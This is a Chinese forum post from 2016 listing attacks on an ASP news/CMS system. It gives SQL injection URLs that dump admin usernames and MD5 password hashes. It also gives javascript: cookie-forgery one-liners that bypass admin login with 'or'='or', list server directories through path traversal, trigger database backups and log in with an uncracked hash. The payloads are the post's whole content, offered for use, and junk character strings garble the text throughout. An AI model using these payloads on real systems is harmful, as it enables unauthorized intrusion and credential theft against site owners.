一、注入
3 V a) @; @) N5 K$ _1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=22 U7 n6 c& X( r1 X. W+ P
5 v& D% U: s) E7 _- ]
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp" 2 A$ P: g, T$ P
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
5 x! @7 a* c4 J% a4 ]可得到用户名和MD5加密码的密码。
4 ~8 W/ P6 l5 t
) {+ l% h1 B3 z二、cookies欺骗; x+ @ P5 W5 @
" e9 C+ \9 z# f1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
- j) r0 D$ l" x+ ^: r+ X# Ajavascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"8 |: O9 Z- u! k5 h0 D) Q
: u' b4 Q0 x$ s! [1 S3 _. [9 H p
2、列目录. ' t# [1 q4 b1 x) M$ `
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=..", G: a4 @4 t5 G. h$ F: o+ W. Q; p
2 o5 S/ g8 R! ]$ }3 a5 f$ c
3、数据库备份(适用性好像比较低.)
O* o" i- z+ U' n' X! L! xjavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
: Y7 q: t% R9 O% z, {) S( ~. x* [( c; _% T" Z' d
4、得到MD5密码解不了密进后台方法
o; }' K; F) p+ n3 a% [javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
' Q' [8 D$ C! [8 T3 O, y, H6 q |
发表于 2016-5-11 14:55:08
收藏
支持
反对